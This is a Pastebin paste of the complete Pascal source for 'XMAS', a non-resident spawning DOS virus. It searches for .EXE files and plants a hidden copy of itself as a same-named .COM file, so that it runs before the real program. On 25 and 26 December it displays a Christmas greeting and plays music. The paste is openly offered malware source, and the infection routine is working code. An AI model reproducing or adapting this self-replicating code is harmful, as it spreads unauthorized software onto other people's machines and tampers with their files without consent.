Advertisement
FlyFar

XMAS.PAS - a non-resident spawning .EXE infector - Source Code

Jul 15th, 2023
2,183
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Pascal 4.29 KB | Cybersecurity | 0 0
  1. {
  2.  
  3.     XMAS Virus, a non-resident spawning .EXE infector by Glenn Benton
  4.     To be compiled with Turbo Assembler 6.0
  5.  
  6.     Files required : XMAS.PAS       - Viral part (this one)
  7.                      XMAS.OBJ       - Music data (composed by myself!)
  8.                      PLAYIT.TPU     - Music player engine
  9.  
  10.     Set the environment variables for different effects :
  11.  
  12.     SET XMAS=YES          (Disable virus)
  13.     SET XMAS=TST          (Plays the music only)
  14.     SET XMAS=DEL          (Deletes the virus when a program is started)
  15.  
  16.     The compiled virus example is compressed and uses 6888 bytes...
  17.  
  18.         On 25th and 26th the virus activates, playing the music and
  19.         wishes you a merry X-mas (nice of me, isn't it?)
  20.        
  21.  
  22. }
  23.  
  24. Program Xmas;
  25.  
  26. {$M 4096,0,512}
  27.  
  28. Uses Crt, Dos, Playit;
  29.  
  30. Label StartOrig;
  31.  
  32. Var
  33.    Year, Month, Day, DayOfWeek : Word;
  34.    DirInfo : SearchRec;
  35.    ComSeek : SearchRec;
  36.    FileFound : Boolean;
  37.    FileName : String;
  38.    Parameters : String;
  39.    OrigName : String;
  40.    P : Byte;
  41.    ExtHere : Boolean;
  42.    Teller : Word;
  43.    StopChar : Char;
  44.    FromF : File;
  45.  
  46. {Dit is de data van het te spelen liedje}
  47. {$L XMAS.OBJ}
  48. Procedure Christmas; EXTERNAL;
  49.  
  50. {Deze routine wordt aangeroepen als het 25 of 26 december is}
  51. Procedure Active;
  52. Begin;
  53. StopChar := #0;
  54. ClrScr;
  55. GotoXY(32,5);
  56. WriteLn('Merry Christmas');
  57. GotoXY(38,7);
  58. WriteLn('and');
  59. GotoXY(31,9);
  60. WriteLn('A Happy New Year!');
  61. GotoXy(31,11);
  62. WriteLn('Wished To You By:');
  63. GotoXy(34,17);
  64. WriteLn('Glenn Benton');
  65. GotoXy(27,24);
  66. WriteLn('Press any key to continue');
  67. Repeat
  68.       PlayOBJ(@Christmas, TRUE, StopChar);
  69. Until StopChar<>#0;
  70. End;
  71.  
  72. {Deze procedure zoekt een EXE file waarvan er geen COM is en stuurt het
  73.  resultaat in de boolean FileFound en de naam van het te maken COM bestand
  74.  in FileName}
  75. Procedure FileSeek;
  76.  
  77. Label Seeker, FileSeekOk;
  78. Begin;
  79. FileFound:=False;
  80. FindFirst('*.EXE',Anyfile,DirInfo);
  81.  
  82. Seeker:
  83. If DosError=18 Then Exit;
  84. FileName:= DirInfo.Name;
  85. Delete(FileName,Length(FileName)-2,3);
  86. Insert('COM',FileName,Length(FileName)+1);
  87. FindFirst(FileName,AnyFile,ComSeek);
  88. If DosError=18 Then Goto FileSeekOk;
  89. FindNext(DirInfo);
  90. Goto Seeker;
  91.  
  92. FileSeekOk:
  93. FileFound:=True;
  94. End;
  95.  
  96. Procedure CopyFile;
  97. var
  98.   FromF, ToF: file;
  99.   NumRead, NumWritten: Word;
  100.   buf: array[1..512] of Char;
  101. begin;
  102.   { Open input file }
  103.   Assign(FromF, ParamStr(0));
  104.   { Record size = 1 }
  105.   Reset(FromF, 1);
  106.   { Open output file }
  107.   Assign(ToF, FileName);
  108.   { Record size = 1 }
  109.   Rewrite(ToF, 1);
  110.   repeat
  111.     BlockRead(FromF,buf,
  112.               SizeOf(buf),NumRead);
  113.     BlockWrite(ToF,buf,NumRead,NumWritten);
  114.   until (NumRead = 0) or
  115.         (NumWritten <> NumRead);
  116.   Close(FromF);
  117.   Close(ToF);
  118.   Assign(ToF,FileName);
  119.   SetFAttr(ToF,Hidden);
  120. end;
  121.  
  122.  
  123. Begin; {Hoofdprocedure}
  124. If (GetEnv('XMAS')='DEL') or (GetEnv('XMAS')='del') Then
  125.    Begin;
  126.    OrigName:=ParamStr(0);
  127.    ExtHere:=False;
  128.    P:=Pos('.COM',OrigName);
  129.    If P<>0 Then ExtHere:=True;
  130.    P:=Pos('.com',OrigName);
  131.    If P<>0 Then ExtHere:=True;
  132.    If ExtHere=False Then
  133.                  OrigName:=OrigName+'.COM';
  134.    Assign(FromF, OrigName);
  135.    SetFAttr(FromF,Archive);
  136.    Erase(FromF);
  137.    Goto StartOrig;
  138.    End;
  139. If (GetEnv('XMAS')='TST') or (GetEnv('XMAS')='tst') Then
  140.    Begin;
  141.    Active;
  142.    Goto StartOrig;
  143.    End;
  144.  
  145. If (GetEnv('XMAS')='YES') or (GetEnv('XMAS')='yes') Then Goto StartOrig;
  146.  
  147. {Datum bekijken of het 25 of 26 december is en indien juist Active aanroepen}
  148. GetDate(Year, Month, Day, DayOfWeek);
  149. If (Month=12) and ((Day=25) or (Day=26)) then Active;
  150.  
  151. {Procedure voor EXE file zoeken aanroepen}
  152. FileSeek;
  153.  
  154. {Als er een kandidaat is gevonden, dit prg als COM erbij zetten}
  155. If FileFound=False Then Goto StartOrig;
  156. CopyFile;
  157.  
  158. StartOrig:
  159. Parameters:='';
  160. For Teller:= 1 to ParamCount Do Parameters:=Parameters+' '+ParamStr(Teller);
  161. OrigName:=ParamStr(0);
  162. ExtHere:=False;
  163. P:=Pos('.COM',OrigName);
  164. If P<>0 Then ExtHere:=True;
  165. P:=Pos('.com',OrigName);
  166. If P<>0 Then ExtHere:=True;
  167. If ExtHere=False Then
  168.                  OrigName:=OrigName+'.EXE';
  169. If ExtHere=True Then
  170.                  Begin;
  171.                  Delete(OrigName,Length(OrigName)-3,4);
  172.                  OrigName:=OrigName+'.EXE';
  173.                  End;
  174. SwapVectors;
  175. Exec(OrigName,Parameters);
  176. SwapVectors;
  177. Halt(DosExitCode);
  178. End.
  179.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement